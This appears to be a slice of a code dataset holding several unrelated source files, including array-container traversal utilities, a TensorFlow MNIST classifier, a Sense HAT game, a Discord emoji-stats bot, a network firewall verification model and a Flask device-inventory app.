The same result must be\n computed whether traversing recursively::\n\n reduce_func([\n reduce_func([\n map_func(subcontainer0.array0),\n map_func(subcontainer0.array1)]),\n reduce_func([\n map_func(subcontainer1.array0),\n map_func(subcontainer1.array1)])])\n\n reducing all of the arrays at once::\n\n reduce_func([\n map_func(subcontainer0.array0),\n map_func(subcontainer0.array1),\n map_func(subcontainer1.array0),\n map_func(subcontainer1.array1)])\n\n or any other such traversal.\n \"\"\"\n def rec(_ary: ArrayOrContainerT) -> ArrayOrContainerT:\n try:\n iterable = serialize_container(_ary)\n except TypeError:\n return map_func(_ary)\n else:\n return reduce_func([\n rec(subary) for _, subary in iterable\n ])\n\n return rec(ary)\n\n\ndef rec_multimap_reduce_array_container(\n reduce_func: Callable[[Iterable[Any]], Any],\n map_func: Callable[..., Any],\n *args: Any) -> Any:\n r\"\"\"Perform a map-reduce over multiple array containers recursively.\n\n :param reduce_func: callable used to reduce over the components of any\n :class:`~arraycontext.ArrayContainer`\\ s in *\\*args* (and those of their\n sub-containers). Must be associative.\n :param map_func: callable used to map a single array of type\n :class:`arraycontext.ArrayContext.array_types`. Returns an array of the\n same type or a scalar.\n\n .. note::\n\n The traversal order is unspecified. *reduce_func* must be associative in\n order to guarantee a sensible result. See\n :func:`rec_map_reduce_array_container` for additional details.\n \"\"\"\n # NOTE: this wrapper matches the signature of `deserialize_container`\n # to make plugging into `_multimap_array_container_impl` easier\n def _reduce_wrapper(ary: ContainerT, iterable: Iterable[Tuple[Any, Any]]) -> Any:\n return reduce_func([subary for _, subary in iterable])\n\n return _multimap_array_container_impl(\n map_func, *args,\n reduce_func=_reduce_wrapper, leaf_cls=None, recursive=True)\n\n# }}}\n\n\n# {{{ freeze/thaw\n\n@singledispatch\ndef freeze(\n ary: ArrayOrContainerT,\n actx: Optional[ArrayContext] = None) -> ArrayOrContainerT:\n r\"\"\"Freezes recursively by going through all components of the\n :class:`ArrayContainer` *ary*.\n\n :param ary: a :meth:`~ArrayContext.thaw`\\ ed :class:`ArrayContainer`.\n\n Array container types may use :func:`functools.singledispatch` ``.register`` to\n register additional implementations.\n\n See :meth:`ArrayContext.thaw`.\n \"\"\"\n if is_array_container(ary):\n return map_array_container(partial(freeze, actx=actx), ary)\n else:\n if actx is None:\n raise TypeError(\n f\"cannot freeze arrays of type {type(ary).__name__} \"\n \"when actx is not supplied. Try calling actx.freeze \"\n \"directly or supplying an array context\")\n else:\n return actx.freeze(ary)\n\n\n@singledispatch\ndef thaw(ary: ArrayOrContainerT, actx: ArrayContext) -> ArrayOrContainerT:\n r\"\"\"Thaws recursively by going through all components of the\n :class:`ArrayContainer` *ary*.\n\n :param ary: a :meth:`~ArrayContext.freeze`\\ ed :class:`ArrayContainer`.\n\n Array container types may use :func:`functools.singledispatch` ``.register``\n to register additional implementations.\n\n See :meth:`ArrayContext.thaw`.\n\n Serves as the registration point (using :func:`~functools.singledispatch`\n ``.register`` to register additional implementations for :func:`thaw`.\n\n .. note::\n\n This function has the reverse argument order from the original function\n in :mod:`meshmode`. 
This was necessary because\n :func:`~functools.singledispatch` only dispatches on the first argument.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return actx.thaw(ary)\n else:\n return deserialize_container(ary, [\n (key, thaw(subary, actx)) for key, subary in iterable\n ])\n\n# }}}\n\n\n# {{{ numpy conversion\n\ndef from_numpy(ary: Any, actx: ArrayContext) -> Any:\n \"\"\"Convert all :mod:`numpy` arrays in the :class:`~arraycontext.ArrayContainer`\n to the base array type of :class:`~arraycontext.ArrayContext`.\n\n The conversion is done using :meth:`arraycontext.ArrayContext.from_numpy`.\n \"\"\"\n def _from_numpy(subary: Any) -> Any:\n if isinstance(subary, np.ndarray) and subary.dtype != \"O\":\n return actx.from_numpy(subary)\n elif is_array_container(subary):\n return map_array_container(_from_numpy, subary)\n else:\n raise TypeError(f\"unrecognized array type: '{type(subary).__name__}'\")\n\n return _from_numpy(ary)\n\n\ndef to_numpy(ary: Any, actx: ArrayContext) -> Any:\n \"\"\"Convert all arrays in the :class:`~arraycontext.ArrayContainer` to\n :mod:`numpy` using the provided :class:`~arraycontext.ArrayContext` *actx*.\n\n The conversion is done using :meth:`arraycontext.ArrayContext.to_numpy`.\n \"\"\"\n return rec_map_array_container(actx.to_numpy, ary)\n\n# }}}\n\n# vim: foldmethod=marker\n","sub_path":"arraycontext/container/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":18979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447679332","text":"#-*- encoding: utf-8 -*-\nimport sys\nfrom itertools import permutations\nr=sys.stdin.readline\n \nN, M = map(int, r().split())\n\nl = [str(num) for num in range(1, N+1)]\n\nfor per in permutations(l, M):\n print(' '.join(per))\n","sub_path":"Algorithm/Baekjoon/15649 N과 M (1)/15649(2).py","file_name":"15649(2).py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347210560","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport parser\nimport urllib.request as ulr\n\nif os.path.exists(\"./MNIST_DATA\") is not True:\n os.mkdir(\"./MNIST_DATA\")\n\n trainImgURL=\"http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz\"\n trainLabURL=\"http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz\"\n testImgURL=\"http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz\"\n testLabURL=\"http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz\"\n\n ulr.urlretrieve(trainImgURL,filename=\"./MNIST_DATA/trainIMG.gz\")\n ulr.urlretrieve(trainLabURL,filename=\"./MNIST_DATA/trainLAB.gz\")\n ulr.urlretrieve(testImgURL,filename=\"./MNIST_DATA/testIMG.gz\")\n ulr.urlretrieve(testLabURL,filename=\"./MNIST_DATA/testLAB.gz\")\n\ntrainIMG=\"./MNIST_DATA/trainIMG.gz\"\ntrainLAB=\"./MNIST_DATA/trainLAB.gz\"\ntestIMG=\"./MNIST_DATA/testIMG.gz\"\ntestLAB=\"./MNIST_DATA/testLAB.gz\"\n\n# tf estimators require inputs as floats and output labels as ints,specifically an index value b/w [0,dimension)\ntrain_data=parser.parse(trainIMG).astype(np.float32)\ntrain_labels=parser.parse(trainLAB).astype(np.int32)\ntest_data=parser.parse(testIMG).astype(np.float32)\ntest_labels=parser.parse(testLAB).astype(np.int32)\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ndef cnn_model_fn(features,labels,mode):\n 
input_layer=tf.reshape(features,[-1,28,28,1]) # batchx28x28x1\n\n conv1=tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5,5],\n padding=\"same\",\n activation=tf.nn.relu\n ) # batchx28x28x32\n\n pool1=tf.layers.max_pooling2d(\n inputs=conv1,\n pool_size=[2,2],\n strides=2\n ) # batchx14x14x32\n\n conv2=tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5,5],\n padding=\"same\",\n activation=tf.nn.relu\n ) # batchx14x14x64\n\n pool2=tf.layers.max_pooling2d(\n inputs=conv2,\n pool_size=[2,2],\n strides=2\n )\n\n pool2_flat=tf.reshape(pool2,[-1,7*7*64]) # batchx1024\n\n dense=tf.layers.dense(\n inputs=pool2_flat,\n units=1024,\n activation=tf.nn.relu\n ) # batchx1024\n\n dropout=tf.layers.dropout(\n inputs=dense,\n rate=0.4,\n training = (mode==tf.estimator.ModeKeys.TRAIN)\n ) # batchx1024\n\n logits=tf.layers.dense(\n inputs=dropout,\n units=10\n ) # batchx10\n\n predictions={\n \"predicted_classes\":tf.argmax(input=logits,axis=1), # predicted class\n \"probabilities\":tf.nn.softmax(logits, name=\"sftmx_tensor\") # probability of this prediction\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n loss=tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer=tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss=loss,global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode,loss=loss,train_op=optimizer)\n\n eval_metric_ops={\n \"accuracy\":tf.metrics.accuracy(labels=labels,predictions=predictions[\"predicted_classes\"])\n }\n\n return tf.estimator.EstimatorSpec(mode=mode,loss=loss,eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n mnist_model=tf.estimator.Estimator(\n model_fn=cnn_model_fn,\n model_dir=\"./mnist-model\"\n )\n\n tensors_to_log={\"probabilities\":\"sftmx_tensor\"}\n logging_hook=tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50\n )\n\n train_input_fn=tf.estimator.inputs.numpy_input_fn(\n x=train_data,\n y=train_labels,\n batch_size=100,\n num_epochs=None,\n shuffle=True\n )\n\n mnist_model.train(\n input_fn=train_input_fn,\n steps=10000,\n hooks=[logging_hook]\n )\n\n eval_input_fn=tf.estimator.inputs.numpy_input_fn(\n x=test_data,\n y=test_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_results=mnist_model.evaluate(\n input_fn=eval_input_fn,\n )\n\n print (eval_results)\n\nif __name__==\"__main__\":\n tf.app.run()\n","sub_path":"mnistclassifier/mnistFinal.py","file_name":"mnistFinal.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367954398","text":"from sense_hat import SenseHat\nfrom time import sleep\nsense = SenseHat()\n\nb = (0, 0, 0)\nw = (255, 255, 255)\nr = (255, 0, 0)\n\nboard = [[r, r, r, b, b, b, b, r],\n [r, b, b, b, b, b, b, r],\n [b, b, b, b, b, r, b, r],\n [b, r, r, b, r, r, b, r],\n [b, b, b, b, b, b, b, b],\n [b, r, b, r, r, b, b, b],\n [b, b, b, r, b, b, b, r],\n [r, r, b, b, b, r, r, r]]\n\ny = 2 # y coordinate of marble\nx = 2 # x coordinate of marble\nboard[y][x] = w # a white marble\n\nboard_1D = sum(board, []) # convert to 1-dimension list\nprint(board_1D) # for code debugging\nsense.set_pixels(board_1D) # display it\n\n# This function checks the pitch value and the x coordinate\n# to determine whether to move the marble in the x-direction.\n# Similarly, it checks the roll value and y coordinate to\n# 
determine whether to move the marble in the y-direction.\n\n\ndef move_marble(pitch, roll, x, y):\n    new_x = x # assume no change to start with\n    new_y = y # assume no change to start with\n    if 1 < pitch < 179 and x != 0:\n        new_x -= 1 # move left\n    elif 359 > pitch > 179 and x != 7:\n        new_x += 1 # move right\n    if 1 < roll < 179 and y != 7:\n        new_y += 1 # move down (y grows toward the bottom row)\n    elif 359 > roll > 179 and y != 0:\n        new_y -= 1 # move up\n    new_x, new_y = check_wall(x, y, new_x, new_y)\n    return new_x, new_y\n\n\ndef check_wall(x, y, new_x, new_y):\n    if board[new_y][new_x] != r:\n        return new_x, new_y\n    elif board[new_y][x] != r:\n        return x, new_y\n    elif board[y][new_x] != r:\n        return new_x, y\n    else:\n        return x, y\n\nwhile True:\n    pitch = sense.get_orientation()['pitch']\n    roll = sense.get_orientation()['roll']\n    board[y][x] = b\n    x, y = move_marble(pitch, roll, x, y)\n    board[y][x] = w\n    sense.set_pixels(sum(board, []))\n    sleep(0.05)\n","sub_path":"lab-exercises/ex6/ex6d.py","file_name":"ex6d.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"307062321","text":"\"\"\"\nscript for building the initial database: looks through message history in all available channels and builds the json stats file\n\"\"\"\nimport json, logging\nimport discord\nfrom emojiget import emojiget\n\nlogging.basicConfig(level=logging.INFO)\n\nclass Client(discord.Client):\n    def __init__(self):\n        discord.Client.__init__(self)\n        self.stats = {}\n\n    async def on_ready(self):\n        logging.info(\"Logged in as {0}\".format(self.user))\n\n        #going through every channel in every guild the bot is in\n        for guild in self.guilds:\n            for channel in guild.text_channels:\n                for message in await channel.history(limit=10000).flatten():\n\n                    #making sure bots (e.g. music bots) are ignored\n                    if not message.author.bot:\n\n                        #defining some variables for later use\n                        guildID = str(message.guild.id)\n                        authorID = str(message.author.id)\n\n                        #checking for custom/partial emoji in message\n                        emojilist = emojiget(message.content)\n\n                        if emojilist:\n                            logging.info(\"Message processed in guild {0}, channel {1}, author {2}: {3} emojis\".format(str(message.guild), message.channel.name, str(message.author), len(emojilist)))\n\n                            #going through each emoji in the message and updating dictionary\n                            for emoji in emojilist:\n                                emoji = str(emoji)\n                                if guildID in self.stats:\n\n                                    if authorID in self.stats[guildID]:\n\n                                        if emoji in self.stats[guildID][authorID]:\n                                            self.stats[guildID][authorID][emoji] += 1\n\n                                        else:\n                                            self.stats[guildID][authorID][emoji] = 1\n\n                                    else:\n                                        self.stats[guildID][authorID] = {emoji: 1}\n\n                                else:\n                                    self.stats[guildID] = {authorID: {emoji: 1}}\n\n        #dumping stats dict to json\n        with open(\"stats.json\", \"w\") as f:\n            f.write(json.dumps(self.stats))\n\n        await self.logout()\n\n\n#init client object and starting the bot with secret token\nclient = Client()\n\nwith open(\"token\", \"r\") as f:\n    TOKEN = f.read()\n\nclient.run(TOKEN)","sub_path":"buildjson.py","file_name":"buildjson.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"413195644","text":"from parmed.amber import * \n\nbase = AmberParm(\"SYSTEM.top\",\"SYSTEM.crd\")\n\noutputf = open(\"charges.csv\",\"w\")\n\nfor at in base.residues[0].atoms:\n    #at name, charge\n    outputf.write(\"%s, %.4f\\n\" % 
(at.name,at.charge))\n\n\noutputf.close()\n","sub_path":"nautilus/buggy/e/charges.py","file_name":"charges.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328015035","text":"import components\n\ndef LSRRFwBroken (sz):\n assert (sz >= 1)\n endhosts = ['e0', 'e1']\n lsrr_boxes = ['l_%d'%(l) for l in xrange(0, sz)]\n firewall = ['f']\n nodes = list()\n nodes.extend(endhosts)\n nodes.extend(lsrr_boxes)\n nodes.extend(firewall)\n addresses = ['ip_%s'%(c) for c in nodes]\n\n ctx = components.Context(nodes, \\\n addresses)\n net = components.Network(ctx)\n # Register something that tells us about LSRR\n ip_lsr_field = components.LSRROption ('ip_lsr', ctx)\n ctx.AddPolicy (ip_lsr_field)\n e0 = components.EndHost(ctx.e0, net, ctx)\n e1 = components.EndHost(ctx.e1, net, ctx)\n ## Yeah I can put this in a list etc., doing it this way mostly for no good reason.\n #a = components.LSRRRouter (ctx.a, ip_lsr_field, net, ctx)\n #b = components.LSRRRouter (ctx.b, ip_lsr_field, net, ctx)\n lsrrs = [components.LSRRRouter (getattr(ctx, n), ip_lsr_field, net, ctx) for n in lsrr_boxes]\n lsrr_addresses = [getattr(ctx, 'ip_%s'%(l.z3Node)) for l in lsrrs]\n f = components.AclFirewall (ctx.f, net, ctx)\n address_mappings = [(e0, ctx.ip_e0), \\\n (e1, ctx.ip_e1), \\\n (f, ctx.ip_f)]\n lsrr_address_mappings = zip(lsrrs, lsrr_addresses)\n address_mappings.extend(lsrr_address_mappings)\n net.setAddressMappings(address_mappings)\n routing_table_base = zip(lsrr_addresses, lsrrs)\n routing_table_base.append((ctx.ip_e0, e0))\n\n net.SetGateway(e1, f)\n\n f.AddAcls([(ctx.ip_e0, ctx.ip_e1)])\n\n f_routing_table = list(routing_table_base)\n f_routing_table.append((ctx.ip_e1, e1))\n net.RoutingTable(f, f_routing_table)\n\n routing_table_base.append((ctx.ip_e1, f))\n\n net.RoutingTable(e0, routing_table_base)\n for l in lsrrs:\n net.RoutingTable(l, routing_table_base)\n net.Attach(e0, e1, f, *lsrrs)\n class LSRRReturn (object):\n def __init__ (self, net, ctx, e0, e1, f, lsrrs):\n self.net = net\n self.ctx = ctx\n self.e0 = e0\n self.e1 = e1\n self.f = f\n self.lsrrs = lsrrs\n self.check = components.PropertyChecker (ctx, net)\n return LSRRReturn (net, ctx, e0, e1, f, lsrrs)\n","sub_path":"tests/concrete_examples/lsrr_fw_example_obv_broken.py","file_name":"lsrr_fw_example_obv_broken.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197243616","text":"from flask_app import app, db\nfrom flask import render_template, request, flash, session, redirect, url_for, jsonify\nfrom .forms import ContactForm, SignupForm, SigninForm, ChangePasswordForm, \\\n AddDeviceForm, SearchDeviceForm, DeviceAssignForm, AssignHistoryForm\nfrom flask_mail import Message, Mail\nfrom .models import User, Device, DeviceAssignment\nfrom functools import wraps\nfrom sqlalchemy import desc\nimport datetime\nfrom threading import Thread\nfrom celery import Celery\n\nmail = Mail()\n\ncelery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])\ncelery.conf.update(app.config)\n\nadmins = [\"gtadala@blackberry.com\", \"pchowdam@blackberry.com\", \"ksunkara@blackberry.com\"]\n\n\n@celery.task\ndef send_async_email(message_details):\n \"\"\"Background task to send an email with Flask-Mail.\"\"\"\n with app.app_context():\n msg = Message(message_details['subject'], recipients=message_details['recipients'])\n msg.body = message_details['body']\n 
mail.send(msg)\n\n\ndef login_required(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        # redirect anonymous users to the sign-in page\n        if 'email' not in session:\n            return redirect(url_for('signin', next=request.url))\n        return render_template(f.__name__+'.html', *args, **kwargs)\n    return decorated_function\n\n\ndef to_bool(value):\n    return str(value).lower() == \"true\"\n\n\n@app.route('/')\n@login_required\ndef home():\n    pass\n\n\n@app.route('/contact', methods=['GET', \"POST\"])\ndef contact():\n    form = ContactForm()\n    if request.method == 'POST':\n        if not form.validate():\n            flash('All fields are required.')\n            return render_template('contact.html', form=form)\n        else:\n            msg = Message(form.subject.data, sender='contact@example.com',\n                          recipients=['your_email@example.com'])\n            msg.body = \"\"\"\n            From: %s <%s>\n            %s\n            \"\"\" % (form.name.data, form.email.data, form.message.data)\n            mail.send(msg)\n            return render_template('contact.html', success=True)\n    elif request.method == 'GET':\n        return render_template('contact.html', form=form)\n\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n    form = SignupForm()\n\n    if 'email' in session:\n        return redirect(url_for('profile'))\n\n    if request.method == 'POST':\n        if not form.validate():\n            return render_template('signup.html', form=form)\n        else:\n            newuser = User(form.firstname.data, form.lastname.data, form.email.data, form.password.data)\n            db.session.add(newuser)\n            db.session.commit()\n\n            session['email'] = newuser.email\n            session['is_admin'] = bool(newuser.admin)\n            return redirect(url_for('profile'))\n\n    elif request.method == 'GET':\n        return render_template('signup.html', form=form)\n\n\n@app.route('/profile')\ndef profile():\n    if 'email' not in session:\n        return redirect(url_for('signin'))\n\n    user = User.query.filter_by(email=session['email']).first()\n\n    if user is None:\n        return redirect(url_for('signin'))\n    else:\n        devices_list = Device.query.join(User).filter(Device.assignee_id==user.uid).all()\n        if not devices_list:\n            message = \"No devices assigned to your name\"\n            return render_template('profile.html', success=False, message=message, user=user)\n\n        message = \"Following list of devices assigned to your name\"\n        return render_template('profile.html', success=True, devices=devices_list, message=message, user=user)\n\n\n@app.route('/device_detail/<vlid>', methods=['GET'])\ndef device_detail(vlid):\n    if 'email' not in session:\n        return redirect(url_for('signin'))\n\n    device_info = Device.query.filter_by(vl_tag=vlid).first()\n\n    if not device_info:\n        message = \"Device Information is not found for device with ID {0}\".format(vlid)\n        return render_template('device_detail.html', success=False, message=message)\n\n    message = \"Device information for device with ID {0}\".format(vlid)\n    user_info = User.query.filter_by(uid=device_info.assignee_id).first()\n    return render_template('device_detail.html', success=True, message=message, info=device_info, user=user_info)\n\n@app.route('/signin', methods=['GET', 'POST'])\ndef signin():\n    form = SigninForm()\n\n    if 'email' in session:\n        return redirect(url_for('profile'))\n\n    if request.method == 'POST':\n        if not form.validate():\n            return render_template('signin.html', form=form)\n        else:\n            user_info = User.query.filter_by(email=form.email.data).first()\n            session['email'] = form.email.data\n            session['is_admin'] = bool(user_info.admin)\n            return redirect(url_for('profile'))\n\n    elif request.method == 'GET':\n        return render_template('signin.html', form=form)\n\n\n@app.route('/signout')\ndef signout():\n    if 'email' not in session:\n        
return redirect(url_for('signin'))\n\n session.pop('email', None)\n return redirect(url_for('home'))\n\n\n@app.route('/change_password', methods=['GET', 'POST'])\ndef change_password():\n form = ChangePasswordForm()\n\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('change_password.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('change_password.html', form=form)\n else:\n user = User.query.filter_by(email=session['email'].lower()).first()\n user.set_password(form.newPassword.data)\n db.session.commit()\n return render_template('change_password.html', success=True)\n\n\n@app.route('/add_device', methods=['GET', 'POST'])\ndef add_device():\n form = AddDeviceForm()\n\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('add_device.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('add_device.html', form=form)\n else:\n secure = to_bool(form.is_secure.data)\n newDevice = Device(variant=form.variant.data.upper(), name=form.name.data.upper(), security=secure,\n part_number=form.part_number.data, imei=form.imei_number.data,\n country=form.country.data.upper(), vlid=form.vlId.data,\n pgrp=form.purpose_group.data, comments=form.comments.data,\n assigned_date=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n db.session.add(newDevice)\n db.session.commit()\n\n user = User.query.filter_by(uid=1).first()\n device_info = Device.query.filter_by(vl_tag=form.vlId.data).first()\n newDeviceAssignment = DeviceAssignment(device_id=device_info.uid,\n user_id=user.uid, device_assigned_date=device_info.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n return render_template('add_device.html', success=True,\n message=\"New device {0} is added to database\".format(form.vlId.data))\n\n\n@app.route('/search_device', methods=['GET', 'POST'])\ndef search_device():\n form = SearchDeviceForm()\n\n if 'email' not in session:\n return redirect(url_for('signin'))\n if request.method == 'GET':\n return render_template('search_device.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('search_device.html', form=form)\n else:\n message = \"Search Results\"\n search_string = form.search_string.data\n devices_list = []\n\n if form.search_using.data == \"vlbb_id\":\n devices_list = Device.query.filter_by(vl_tag=search_string).all()\n if not devices_list:\n message = \"No Devices found with VLBB ID: {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"imei_number\":\n devices_list = Device.query.filter_by(imei_number=search_string).all()\n if not devices_list:\n message = \"No Devices found with IMEI number {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"device_name\":\n devices_list = Device.query.filter(Device.name.contains(search_string.upper())).all()\n if not devices_list:\n message = \"No Devices found with Device Name {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"device_variant\":\n devices_list = 
Device.query.filter(Device.variant.contains(search_string)).all()\n if not devices_list:\n message = \"No Devices found with Device Variant {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"user_email\":\n user_info = User.query.filter(User.email.contains(search_string)).first()\n if not user_info:\n message = \"No user found with email address {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n devices_list = Device.query.join(User).filter(Device.assignee_id == user_info.uid).all()\n if not devices_list:\n message = \"No devices assigned to user {0}\".format(user_info.firstname)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n if form.search_using.data == \"vlbb_id\":\n message += \" for device VLBB ID: {0}\".format(search_string)\n elif form.search_using.data == \"imei_number\":\n message += \" for device IMEI Number: {0}\".format(search_string)\n elif form.search_using.data == \"device_name\":\n message += \" for device name: {0}\".format(search_string.upper())\n elif form.search_using.data == \"device_variant\":\n message += \" for device variant contains words: {0}\".format(search_string.upper())\n elif form.search_using.data == \"user_email\":\n message += \" for devices assigned to user with email address contains letters: {0}\".format(search_string)\n\n for device in devices_list:\n device.user_info = User.query.filter_by(uid=device.assignee_id).first()\n\n return render_template('search_device.html', form=form, devices=devices_list, success=True, message=message)\n\n\n@app.route('/assign_device/', methods=['GET'])\ndef assign_device(vlid):\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n device_info = Device.query.filter_by(vl_tag=vlid).first()\n\n if not device_info:\n message = \"Device Information is not found for device with ID {0}\".format(vlid)\n return render_template('assign_device.html', success=False, message=message)\n\n user = User.query.filter_by(email=session['email'].lower()).first()\n device = Device.query.filter_by(vl_tag=vlid).update(dict(assignee_id=user.uid))\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=vlid).first()\n device.assigned_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=vlid).first()\n newDeviceAssignment = DeviceAssignment(device_id=device.uid,\n user_id=user.uid, device_assigned_date=device.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n # Send Email to users / admins\n send_email_helper(user, device)\n\n message = \"Device with VLBB ID {0} is assigned with your name\".format(vlid)\n return render_template('search_device.html', success=True, message=message, from_assigned=True)\n\n\n@app.route('/assign_device_user', methods=['POST', 'GET'])\ndef assign_device_user():\n form = DeviceAssignForm()\n\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('assign_device_user.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('assign_device_user.html', form=form)\n\n user = User.query.filter_by(email=form.email_id.data.lower()).first()\n if not user:\n message = \"User might not have registered his email id, ask him to register\"\n return 
render_template('assign_device_user.html', form=form, success=False, message=message)\n\n device = Device.query.filter_by(vl_tag=form.vl_id.data).first()\n if not device:\n message = \"Deice not found with VLBB Tag {0}, please check the data entered\".format(form.vl_id.data)\n return render_template('assign_device_user.html', form=form, success=False, message=message)\n\n if device.assignee_id == user.uid:\n message = \"User is already assigned with selected device\"\n return render_template('assign_device_user.html', form=form, success=False, message=message)\n else:\n device.assignee_id = user.uid\n device.assigned_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=form.vl_id.data).first()\n newDeviceAssignment = DeviceAssignment(device_id=device.uid,\n user_id=user.uid, device_assigned_date=device.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n # Send Email to users / admins\n send_email_helper(user, device)\n\n message = \"User is assigned with device {0}\".format(device.vl_tag)\n return render_template('assign_device_user.html', form=form, success=True, message=message)\n\n\n@app.route('/assignment_history', methods=['POST', 'GET'])\ndef assignment_history():\n form = AssignHistoryForm()\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('assignment_history.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('assignment_history.html', form=form)\n search_device = Device.query.filter_by(vl_tag=form.vlid.data).first()\n\n\n if not search_device:\n message = \"No devices found with selected VLBB ID {0}\".format(form.vlid.data)\n return render_template('assignment_history.html', form=form, success=False, message=message)\n\n device = DeviceAssignment.query.filter_by(device_id=search_device.uid).\\\n order_by(desc(DeviceAssignment.device_assigned_date)).all()\n if not device:\n message = \"No devices found with selected VLBB ID {0}\".format(form.vlid.data)\n return render_template('assignment_history.html', form=form, success=False, message=message)\n\n output = []\n for _d in device:\n temp = []\n temp.append(Device.query.filter_by(uid=_d.device_id).first().vl_tag)\n temp.append(User.query.filter_by(uid=_d.user_id).first().firstname)\n temp.append(_d.device_assigned_date)\n output.append(temp)\n\n message = \"Device Assignment History for device with VLBB ID: {0}\".format(format(form.vlid.data))\n return render_template('assignment_history.html', form=form, success=True, message=message, data=output)\n\n\ndef send_email_helper(user, device):\n\n message = \"Hello {0}, \\n\\nThe device with VL Tag {1} \".format(user.firstname, device.vl_tag) + \\\n \" is assigned to your name. 
\\n\" + \\\n \"\\nIf this device is not with you, please contact inventory admins\\n\" + \\\n \"\\nPlease visit \" + url_for('profile', _external=True) + \" for more details\" + \\\n \"\\n\\n Thanks, \\n BlackBerry Hyderabad Inventory Team\"\n\n # Send email to user\n subject = 'Device with VL Tag {0} assigned with your name'.format(device.vl_tag)\n\n message_details = dict()\n message_details[\"subject\"] = subject\n message_details[\"recipients\"] = [user.email]\n message_details[\"body\"] = message\n\n send_async_email.delay(message_details)\n\n # Send email to admins\n subject = 'Device with VL Tag {0} assigned to {1}'.format(device.vl_tag, user.firstname)\n message_details[\"subject\"] = subject\n message_details[\"recipients\"] = admins\n\n send_async_email.delay(message_details)\n # Done sending emails to users and admins\n\n@app.route('/all_devices')\ndef all_devices():\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n user = User.query.filter_by(email=session['email']).first()\n\n if user is None:\n return redirect(url_for('signin'))\n else:\n devices_list = Device.query.all()\n if not devices_list:\n message = \"No devices available in inventory\"\n return render_template('all_devices.html', success=False, message=message, user=user)\n\n message = \"Following list of currently in BB Hyderabad\"\n return render_template('all_devices.html', success=True, devices=devices_list, message=message, user=user)\n\n\n","sub_path":"app/flask_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":17765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511379971","text":"# fabfile.py\nimport os, re\nfrom datetime import datetime\nimport glob\n\n# 导入Fabric API:\nfrom fabric.api import *\n\n# 